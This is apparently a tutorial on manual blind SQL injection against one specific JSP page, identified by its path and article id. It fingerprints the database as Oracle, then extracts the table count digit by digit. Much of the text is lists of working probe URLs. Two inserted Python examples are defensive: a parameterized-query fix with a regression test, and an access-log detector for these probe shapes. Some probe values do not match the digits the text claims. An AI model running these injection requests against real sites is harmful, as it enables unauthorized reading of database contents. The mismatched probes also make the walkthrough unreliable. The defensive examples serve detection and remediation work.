Manual injection of a JSP page: the probe requests

1. Determine the injection type (numeric or string)

Telling string-type from numeric-type parameters: (I hope someone can refine this further and split it into separate numeric-type and string-type tests)

/index_kaoyan_view.jsp?id=117 And user>char(0)
/index_kaoyan_view.jsp?id=117 And user<char(0)
/index_kaoyan_view.jsp?id=117 And user>char(0) And 1=1
/index_kaoyan_view.jsp?id=117 And user<char(0) And %25=
/index_kaoyan_view.jsp?id=117 And user<char(0) And ( )=(
/index_kaoyan_view.jsp?id=117) And user<char(0)
/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
/index_kaoyan_view.jsp?id=117 And str(98)<str(97)
/index_kaoyan_view.jsp?id=117 And str(98)>str(97) And 1=1
/index_kaoyan_view.jsp?id=117 And str(98)<str(97) And %25=
/index_kaoyan_view.jsp?id=117 And user<char(0)
/index_kaoyan_view.jsp?id=117 And str(98)<str(97) And ( )=(
/index_kaoyan_view.jsp?id=117) And str(98)<str(97)
These return the normal page, which points to Oracle (CHR rather than CHAR; the USER_TABLES, nvl and UNISTR probes below are Oracle syntax as well):
/index_kaoyan_view.jsp?id=117 And USER>CHR(0)
/index_kaoyan_view.jsp?id=117 And USER<CHR(0)
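The step-1 test above only works because the id parameter is pasted into the SQL text, so the appended condition becomes part of the WHERE clause. The following Python script is an added example, not code from the original page: the real source of index_kaoyan_view.jsp is not shown, so the article table, its rows and the sqlite3 backend are constructed stand-ins. It places the vulnerable concatenation beside the hardened form (a bound parameter plus integer validation; in the JSP itself this is java.sql.PreparedStatement with setInt) and uses the page's own true/false comparison as a regression check that the fix removes the observable difference.

```python
import sqlite3

# Constructed sample rows standing in for the page's article table
# (the real schema behind index_kaoyan_view.jsp is not on the page).
SAMPLE_ROWS = [(116, "Article 116"), (117, "Article 117"), (118, "Article 118")]


def make_db():
    """Build an in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn, raw_id):
    """Vulnerable pattern: the request parameter is concatenated into the SQL
    text, so 'And 1=1' / 'And 1=2' appended to the id is parsed as SQL.
    This is the behaviour the page's probes depend on."""
    sql = "SELECT title FROM article WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, raw_id):
    """Hardened pattern: validate the type first, then bind the value.
    The bound value is never parsed as SQL, and anything that is not a
    plain integer is rejected before a query is issued at all."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return []
    return [row[0] for row in conn.execute(
        "SELECT title FROM article WHERE id=?", (article_id,))]


def boolean_probe_distinguishable(lookup, conn):
    """The page's step-1 check, used here as a regression test for the fix:
    do a true and a false condition appended to the id give different
    results? True means the endpoint leaks a boolean side channel."""
    true_case = lookup(conn, "117 And 1=1")
    false_case = lookup(conn, "117 And 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("concat  distinguishable:", boolean_probe_distinguishable(lookup_concat, db))
    print("param   distinguishable:", boolean_probe_distinguishable(lookup_param, db))
```

The distinguishability check belongs in the application's own test suite: it fails on the concatenated query and passes on the bound one. Binding alone is enough to stop the injection on a numeric column; the integer validation in front of it additionally turns malformed ids into a clean empty result rather than a database error, which removes the 200-versus-500 signal the page's probes read.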
 
2. Enumerate the number of tables and the table names
The table count is 3 digits long (length of the COUNT(*) result is 3):
/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)
 
The following guesses the table count one digit at a time.
First digit of the table count: 1
/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
 
Second digit of the table count: 3
/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
 
Third digit of the table count: 1

/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
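Each digit in step 2 costs a run of near-identical requests that differ only in the compared ASCII value, and the page reads the answer from whether the normal page or an error comes back. That volume and that status mix are what make the activity visible in web-server logs. The following Python script is an added example, not code from the original page: it parses Common Log Format lines, URL-decodes the query string, matches it against the probe shapes shown above, and flags clients that send repeated matches. The log lines, client addresses and timestamps are constructed; the signature names and the threshold are this example's own choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format). The request
# strings mirror the probe shapes on the page; addresses and times are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Sep/2024:07:30:01 +0000] "GET /index_kaoyan_view.jsp?id=117 HTTP/1.1" 200 5120
203.0.113.7 - - [22/Sep/2024:07:30:05 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%20user%3Echar(0) HTTP/1.1" 500 812
203.0.113.7 - - [22/Sep/2024:07:30:09 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%20USER%3ECHR(0) HTTP/1.1" 200 5120
203.0.113.7 - - [22/Sep/2024:07:31:02 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%203=nvl(length((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES)),0) HTTP/1.1" 200 5120
203.0.113.7 - - [22/Sep/2024:07:31:40 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%2049=ascii(substr((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES),1,1)) HTTP/1.1" 200 5120
203.0.113.7 - - [22/Sep/2024:07:31:44 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%2051=ascii(substr((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES),2,1)) HTTP/1.1" 200 5120
198.51.100.20 - - [22/Sep/2024:07:32:10 +0000] "GET /index_kaoyan_view.jsp?id=118 HTTP/1.1" 200 4870
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each signature names one probe shape from the page. Matching is done on the
# URL-decoded, lower-cased query string so %20 / %3E encodings cannot hide it.
SIGNATURES = {
    "dbms_fingerprint": re.compile(
        r"\buser\s*[<>]\s*ch(?:a)?r\(0\)|\bstr\(98\)\s*[<>]\s*str\(97\)|\bunistr\(\d\)"),
    "blind_length": re.compile(r"nvl\(\s*length\("),
    "blind_char": re.compile(r"ascii\(\s*substr\("),
    "catalog_query": re.compile(r"\bfrom\s+user_tables\b"),
}


def parse_line(line):
    """Split one CLF line into its fields; None if the line does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def classify_request(url):
    """Return the set of signature names that match the request's query string."""
    query = url.partition("?")[2]
    decoded = unquote_plus(query).lower()
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def analyze(log_text, threshold=3):
    """Group matching requests per client and return those at or above the
    threshold, with the signatures seen and the HTTP status mix. A 200/500 mix
    on the same resource is the boolean side channel the probes rely on."""
    per_client = defaultdict(lambda: {"probes": 0, "signatures": set(), "statuses": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sigs = classify_request(rec["url"])
        if not sigs:
            continue
        entry = per_client[rec["ip"]]
        entry["probes"] += 1
        entry["signatures"] |= sigs
        entry["statuses"].add(rec["status"])
    return {
        ip: {"probes": e["probes"],
             "signatures": sorted(e["signatures"]),
             "statuses": sorted(e["statuses"])}
        for ip, e in per_client.items() if e["probes"] >= threshold
    }


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

The threshold matters more than any single signature: one matching request can be noise, but a digit-by-digit enumeration like the one above produces dozens of requests against the same parameter within minutes. Decoding before matching is essential, since the same probe can arrive with different percent-encodings or letter case; the signatures here cover only the Oracle functions the page uses, so other dialects need their own entries.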

Time: 2024-09-22 07:32:44
